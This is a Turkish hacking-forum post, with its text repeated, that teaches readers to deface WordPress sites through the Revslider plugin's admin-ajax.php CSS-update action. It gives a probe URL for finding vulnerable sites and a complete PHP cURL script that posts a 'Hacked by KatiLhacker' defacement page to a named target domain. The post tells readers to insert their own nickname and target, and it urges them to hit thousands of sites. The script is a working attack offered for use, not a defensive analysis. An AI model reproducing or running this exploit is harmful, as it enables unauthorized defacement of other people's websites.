[FONT=Verdana, Arial, Helvetica, sans-serif]- Bu dökümanda sizlere Wordpress içerik yönetim sistemine bağlı pluginsin yarattığı güvenlik açığından bahsetmek istiyorum.
Bu anlatıcağım güvenlik açığı ile binlerce wordpress tabanlı web sitelerine imzanızı atarak zone kasabilirsiniz.
Öncelikle size güvenlik açığından kısaca bahsetmek istiyorum.
- Revsliderin admin-ajax.php üzerine uzaktan css düzenleme yetkisi vermesi sonucuyla güvenlik açığı ortaya çıkıyor.
- Uzak bir phpden hedef wordpress revslidere verdiğimiz komutu hedef sitemiz kabül etmesiyle site deface ediliyor.
- Anlatımını yapacağım exploit çok güncel ( yaygın ) bir güvenlik açığıdır. 2 3 Ay önce warez olmasına rağmen bu gece yaptığım incelemede 10 dakikada 250 adet açığı olan site bulduğumu farkettim bu nedenle sizlerle paylaşmak istedim. Bizim public ettiğimiz işe yaramaz dediğimiz exploitlerin şimdiki nesillerin vazgeçilmezi olduğunuda bu exploit ile görebiliyorum.
############################################################
# Wordpress Hacking [Giriş] Revslider Plugins #
- Güvenlik açığı hakkında bilgi vermeden mantığı anlatmak istiyorum. Mantık çok basit :
- Açığımızın bulunduğu konum :
/wp-content/plugins/revslider/revslider_admin.php
Exploit:
wordpress/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Yukarıda gördüğünüz üzere güvenlik açığı wp-admin klasörünün içinde bulunan admin-ajax.php üzerinden yürütülüyor.
Şimdi bu güvenlik açığı ile siteye nasıl bir zarar verebileceğimize geçelim.
Öncelikle revslider eklentisi bulunan herhangi bir wordpress siteye girelim.
Site sonuna :
wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Kodunu ekleyip giriş yaptığımızda karşılaştığımız ekran :
Bu ise sitede güvenlik açığı bulunduğuna karşılıktır.
Basit gibi görünsede günümüz wordpress sistemlerinde rewslider eklentisi çok fazla yaygın olduğundan dolayı bu exploit ile binlerce zone kasabilirsiniz.
( Kasanlara şahit oluyorum son 1 2 aydır paylaşma imkanı ancak bulabildim )
Yukarıdaki gibi adım adım ilerledik sitede açığı bulduk buradan sonra yapmanız gereken localhostta veya herhangi bir hostta vereceğim php kodlarını çalıştırmak dikkat etmeniz gereken nokta phpye chmod 777 vermeniz gerekiyor.
- PHP dosyasını hedef siteye göre düzenledikten sonra sitenizden phpye giriş yapıp hedef siteye erişim sağlamasını sağlayabilirsiniz.
Örneğin :
site.com/a.php gibi düzenleyip a.phpye site üzerinden girmelisiniz.
Sonrasında wordpress.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Şeklinde siteye giriş yapıp indexinizi gördüğünüzü fark ediceksiniz.
PHP KODLAR :
PHP Kodlarda düzenlenmesi gereken yerler :
"data" => "x<bOdy style=color: transparent;background-color: black><center><h1><b style=color: white>Hacked by KatiLhacker<br><p style=color: transparent>"
Kısımındaki katilhacker yazan yere nickinizi.
$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");
Kısımındaki statewidesolutionsnj.com yazan yerede revslider pluginsi kurulu hedef wordpress sitenizi yazmalısınız.
..
Bu exploit ile binlerce wordpress siteyi hackleyebilirsiniz [/FONT]
Bu anlatıcağım güvenlik açığı ile binlerce wordpress tabanlı web sitelerine imzanızı atarak zone kasabilirsiniz.
Öncelikle size güvenlik açığından kısaca bahsetmek istiyorum.
- Revsliderin admin-ajax.php üzerine uzaktan css düzenleme yetkisi vermesi sonucuyla güvenlik açığı ortaya çıkıyor.
- Uzak bir phpden hedef wordpress revslidere verdiğimiz komutu hedef sitemiz kabül etmesiyle site deface ediliyor.
- Anlatımını yapacağım exploit çok güncel ( yaygın ) bir güvenlik açığıdır. 2 3 Ay önce warez olmasına rağmen bu gece yaptığım incelemede 10 dakikada 250 adet açığı olan site bulduğumu farkettim bu nedenle sizlerle paylaşmak istedim. Bizim public ettiğimiz işe yaramaz dediğimiz exploitlerin şimdiki nesillerin vazgeçilmezi olduğunuda bu exploit ile görebiliyorum.
############################################################
# Wordpress Hacking [Giriş] Revslider Plugins #
- Güvenlik açığı hakkında bilgi vermeden mantığı anlatmak istiyorum. Mantık çok basit :
- Açığımızın bulunduğu konum :
/wp-content/plugins/revslider/revslider_admin.php
Exploit:
wordpress/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Yukarıda gördüğünüz üzere güvenlik açığı wp-admin klasörünün içinde bulunan admin-ajax.php üzerinden yürütülüyor.
Şimdi bu güvenlik açığı ile siteye nasıl bir zarar verebileceğimize geçelim.
Öncelikle revslider eklentisi bulunan herhangi bir wordpress siteye girelim.
Site sonuna :
wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Kodunu ekleyip giriş yaptığımızda karşılaştığımız ekran :
Bu ise sitede güvenlik açığı bulunduğuna karşılıktır.
Basit gibi görünsede günümüz wordpress sistemlerinde rewslider eklentisi çok fazla yaygın olduğundan dolayı bu exploit ile binlerce zone kasabilirsiniz.
( Kasanlara şahit oluyorum son 1 2 aydır paylaşma imkanı ancak bulabildim )
Yukarıdaki gibi adım adım ilerledik sitede açığı bulduk buradan sonra yapmanız gereken localhostta veya herhangi bir hostta vereceğim php kodlarını çalıştırmak dikkat etmeniz gereken nokta phpye chmod 777 vermeniz gerekiyor.
- PHP dosyasını hedef siteye göre düzenledikten sonra sitenizden phpye giriş yapıp hedef siteye erişim sağlamasını sağlayabilirsiniz.
Örneğin :
site.com/a.php gibi düzenleyip a.phpye site üzerinden girmelisiniz.
Sonrasında wordpress.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Şeklinde siteye giriş yapıp indexinizi gördüğünüzü fark ediceksiniz.
PHP KODLAR :
Quote:
<?php
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "x<bOdy style=color: transparent;background-color: black><center><h1><b style=color: white>Hacked by KatiLhacker<br><p style=color: transparent>"
);
$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOW********, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
?>
#############################################################<?php
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "x<bOdy style=color: transparent;background-color: black><center><h1><b style=color: white>Hacked by KatiLhacker<br><p style=color: transparent>"
);
$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOW********, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
?>
PHP Kodlarda düzenlenmesi gereken yerler :
"data" => "x<bOdy style=color: transparent;background-color: black><center><h1><b style=color: white>Hacked by KatiLhacker<br><p style=color: transparent>"
Kısımındaki katilhacker yazan yere nickinizi.
$ch = curl_init ("http://statewidesolutionsnj.com/wp-admin/admin-ajax.php");
Kısımındaki statewidesolutionsnj.com yazan yerede revslider pluginsi kurulu hedef wordpress sitenizi yazmalısınız.
..
Bu exploit ile binlerce wordpress siteyi hackleyebilirsiniz [/FONT]